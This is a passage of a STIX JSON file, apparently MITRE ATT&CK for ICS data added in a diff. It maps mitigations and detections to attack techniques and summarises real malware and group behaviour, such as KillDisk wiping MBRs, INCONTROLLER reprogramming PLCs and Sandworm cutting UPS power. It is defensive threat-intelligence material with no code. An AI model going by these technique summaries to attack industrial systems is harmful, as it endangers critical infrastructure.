"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.168Z", + "relationship_type": "mitigates", + "description": "Segment networks and systems appropriately to reduce access to critical system and services communications.\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--9ffc1ecb-09de-4841-a1f6-ebd1f3be7cea", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:40:06.988Z", 
+ "description": "Monitor for a file that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--e905dad2-00d6-477c-97e8-800427abd0e8", + "target_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2ecc567f-3aaa-4bd8-935f-4808d177a552", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.173Z", + "relationship_type": "mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 
2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--04bf72de-75ba-4d95-ad24-f93ad835180c", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Booz Allen Hamilton", + "description": "Booz Allen Hamilton When The Lights Went Out Retrieved. 2019/10/22 ", + "url": "https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:54:26.520Z", + "description": "[KillDisk](https://attack.mitre.org/software/S0607) erases the master boot record (MBR) and system logs, leaving the system unusable. (Citation: Booz Allen Hamilton)", + "relationship_type": "uses", + "source_ref": "malware--e221eb77-1502-4129-af1d-fe1ad55e7ec6", + "target_ref": "attack-pattern--138979ba-0430-4de6-a128-2fc0b056ba36", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7c1eee62-3307-4e25-8a20-919ccd56ec1c", + "created": "2022-09-29T01:37:13.671Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Wylie-22", + "description": "Jimmy Wylie. (2022, August). Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. 
Defcon 30.", + "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf" + }, + { + "source_name": "Brubaker-Incontroller", + "description": "Nathan Brubaker, Keith Lunden, Ken Proska, Muhammad Umair, Daniel Kapellmann Zafra, Corey Hildebrandt, Rob Caldwell. (2022, April 13). INCONTROLLER: New State-Sponsored Cyber Attack Tools Target Multiple Industrial Control Systems. Retrieved September 28, 2022.", + "url": "https://www.mandiant.com/resources/incontroller-state-sponsored-ics-tool" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-13T16:53:47.441Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can use the CODESYS protocol to download programs to Schneider PLCs.(Citation: Wylie-22)(Citation: Brubaker-Incontroller) \n\n[INCONTROLLER](https://attack.mitre.org/software/S1045) can modified program logic on Omron PLCs using either the program download or backup transfer functions available through the HTTP server.(Citation: Wylie-22) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9cf83701-a347-47b4-a67b-280df95b275d", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:41:05.460Z", + "description": "Monitor for changes made to scheduled jobs that may attempt to manipulate features of their 
artifacts to make them appear legitimate or benign to users and/or security tools.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--faa34cf6-cf32-4dc9-bd6a-8f7a606ff65b", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2683e59a-dee3-485a-a355-ed2ee0a23d5d", + "created": "2022-09-26T16:16:21.749Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:16:21.749Z", + "description": "Monitor applications logs for any access attempts to operational databases (e.g., historians) or other sources of operational data within the ICS environment. These devices should be monitored for adversary collection using techniques relevant to the underlying technologies (e.g., Windows, Linux).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--984992e3-0407-406a-b8dd-c114d8b2d9a2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.172Z", + "relationship_type": "mitigates", + "description": "Devices should authenticate all messages between master and outstation assets.\n", + "source_ref": 
"course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--842a2b85-4e77-4eb6-99e1-c4a231aadf48", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.187Z", + "relationship_type": "mitigates", + "description": "Network allowlists can be implemented through either host-based files or system host files to specify what external connections (e.g., IP address, MAC address, port, protocol) can be made from a device.\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--e6e0ef82-2cb6-43fe-8f4a-b9e4d5a57b13", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.081Z", + "relationship_type": "mitigates", + "description": "Segment operational network and systems to restrict access to critical system functions to predetermined management systems. 
(Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--71422483-33e4-4131-a4ec-40322d91d8a0", + "created": "2019-06-24T17:20:24.258Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Catalin Cimpanu April 2016", + "description": "Catalin Cimpanu 2016, April 26 Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary Retrieved. 2019/10/14 ", + "url": "https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml" + }, + { + "source_name": "Symantec June 2015", + "description": "Symantec 2015, June 30 Simple steps to protect yourself from the Conficker Worm Retrieved. 2019/12/05 ", + "url": "https://support.symantec.com/us/en/article.tech93179.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-17T15:38:28.233Z", + "description": "[Conficker](https://attack.mitre.org/software/S0608) exploits Windows drive shares. Once it has infected a computer, [Conficker](https://attack.mitre.org/software/S0608) automatically copies itself to all visible open drive shares on other computers inside the network. 
(Citation: Symantec June 2015) Nuclear power plant officials suspect someone brought in [Conficker](https://attack.mitre.org/software/S0608) by accident on a USB thumb drive, either from home or computers found in the power plant's facility. (Citation: Catalin Cimpanu April 2016)", + "relationship_type": "uses", + "source_ref": "malware--58eddbaf-7416-419a-ad7b-e65b9d4c3b55", + "target_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6637d8e6-6578-4d15-a993-d63ced4c4464", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.099Z", + "relationship_type": "mitigates", + "description": "Authenticate all access to field controllers before authorizing access to, or modification of, a device's state, logic, or programs. 
Centralized authentication techniques can help manage the large number of field controller accounts needed across the ICS.\n", + "source_ref": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3", + "target_ref": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--00e6c22b-9275-4039-b6d4-2ac0680325d6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.104Z", + "relationship_type": "mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 
2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--8f7ccb2b-de2a-4a5c-9f1e-d5e58e69efa8", + "created": "2023-03-30T19:00:57.773Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T19:00:57.773Z", + "description": "Data loss prevention can restrict access to sensitive data and detect sensitive data that is unencrypted.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--337c4e2a-21a7-4d9a-bfee-9efd6cebf0e5", + "target_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--711f17c2-c9f6-4d8d-bf79-117fcdc592c0", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:29:38.448Z", + "description": "Monitor network traffic for default credential use in protocols that allow unencrypted authentication.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + 
}, + { + "type": "relationship", + "id": "relationship--7dad75e6-f569-4bb9-ad75-5eda55dff0b1", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:54:12.966Z", + "description": "Monitor for API calls (such as GetAdaptersInfo() and GetIpNetTable()) that may gather details about the network configuration and settings, such as IP and/or MAC addresses. Also monitor for API calls that may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. For added context on adversary procedures and background see [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) and [System Network Connections Discovery](https://attack.mitre.org/techniques/T1049).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e", + "target_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--cf8ac499-8c1c-4615-b933-7587f1b9488b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.216Z", + "relationship_type": "mitigates", + "description": "The encryption of firmware should be considered to prevent adversaries from identifying possible vulnerabilities within the firmware.\n", + "source_ref": "course-of-action--9f99fcfd-772e-4e63-9d39-e45612e546dc", + "target_ref": 
"attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--aa726ced-f2ac-4113-8d05-8687b7d7ff91", + "created": "2022-09-26T16:35:07.728Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:35:07.728Z", + "description": "Monitor for new master devices communicating with outstations, which may be visible in alarms within the ICS environment.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "target_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--15188683-7ded-4578-9102-73459ecbe095", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:37:54.914Z", + "description": "Monitor for newly executed processes related to services specifically designed to accept remote graphical connections, such as RDP and VNC. 
[Remote Services](https://attack.mitre.org/techniques/T0886) and [Valid Accounts](https://attack.mitre.org/techniques/T0859) may be used to access a host’s GUI.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2c6f9c9e-efa9-4a87-aadf-64b2aeeaa09a", + "created": "2021-04-11T14:06:54.109Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", + "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ", + "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:54:43.581Z", + "description": "In the 2015 attack on the Ukrainian power grid, the [Sandworm Team](https://attack.mitre.org/groups/G0034) scheduled disconnects of uninterruptable power supply (UPS) systems so that when power was disconnected from the substations, the devices would shut down and service could not be recovered. 
(Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--94654460-b115-4056-beb1-e982ed33437b", + "created": "2023-03-30T18:59:46.674Z", + "revoked": false, + "external_references": [ + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + }, + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T18:59:46.674Z", + "description": "Protect files stored locally with proper permissions to limit opportunities for adversaries to interact and collect information from the local system. 
(Citation: Keith Stouffer May 2015) (Citation: National Institute of Standards and Technology April 2013)", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f9fcb3ec-6de0-4559-8cd9-ef1c0c7d1971", + "target_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b8f6d6a8-e668-4596-8ec2-41c5d1bd211d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.097Z", + "relationship_type": "mitigates", + "description": "All field controllers should restrict the modification of programs to only certain users (e.g., engineers, field technician), preferably through implementing a role-based access mechanism.\n", + "source_ref": "course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd", + "target_ref": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--9cca3120-c95e-4f5e-bc4b-0521ab5cc512", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.203Z", + "relationship_type": "mitigates", + "description": "Segment operational network and systems to restrict access to critical system functions to predetermined management systems. 
(Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--bcaa4f7e-2e84-4bbb-9fb7-ca8fb003108f", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T13:49:50.583Z", + "description": "Authenticate connections fromsoftware and devices to prevent unauthorized systems from accessing protected management functions.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9f43126d-5f6c-42a9-9908-49175c27ead7", + "created": "2023-03-30T19:27:26.398Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Industroyer2 ESET April 2022", + "description": "ESET. (2022, April 12). Industroyer2: Industroyer reloaded. 
Retrieved March 30, 2023.", + "url": "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T15:49:13.700Z", + "description": "(Citation: Industroyer2 ESET April 2022)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "malware--6a0d0ea9-b2c4-43fe-a552-ac41a3009dc5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--679d216f-9bf7-428a-8d5b-72a84d6d45ab", + "created": "2022-09-27T15:40:41.869Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "EyeofRa Detecting Hooking June 2017", + "description": "Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense against user-land. Retrieved December 12, 2017.", + "url": "https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/" + }, + { + "source_name": "Zairon Hooking Dec 2006", + "description": "Felici, M. (2006, December 6). Any application-defined hook procedure on my machine?. Retrieved December 12, 2017.", + "url": "https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/" + }, + { + "source_name": "Microsoft Hook Overview", + "description": "Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx" + }, + { + "source_name": "PreKageo Winhook Jul 2011", + "description": "Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.", + "url": "https://github.com/prekageo/winhook" + }, + { + "source_name": "Jay GetHooks Sept 2011", + "description": "Satiro, J. 
(2011, September 14). GetHooks. Retrieved December 12, 2017.", + "url": "https://github.com/jay/gethooks" + }, + { + "source_name": "Volatility Detecting Hooks Sept 2012", + "description": "Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.", + "url": "https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:43:36.888Z", + "description": "Monitor for API calls that can be used to install a hook procedure, such as the SetWindowsHookEx and SetWinEventHook functions.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e", + "target_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1299dd2d-4f42-4f5f-876b-bf7dacd17c79", + "created": 